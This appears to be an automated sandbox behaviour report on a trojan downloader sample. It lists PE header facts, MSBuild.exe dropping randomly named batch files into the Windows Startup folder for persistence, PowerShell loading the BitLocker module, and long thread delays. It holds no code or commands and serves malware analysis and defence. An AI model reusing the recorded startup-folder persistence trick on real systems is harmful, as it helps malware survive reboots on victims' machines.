Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static file information: File size 2274400 > 1048576

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: section name: .managed
Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Static PE information: section name: hydrated

Boot Survival

Drops script or batch files to the startup folder

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Memory allocated: 19C17790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599884	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599775	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599540	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599420	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599298	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599163	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599035	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598561	Jump to behavior
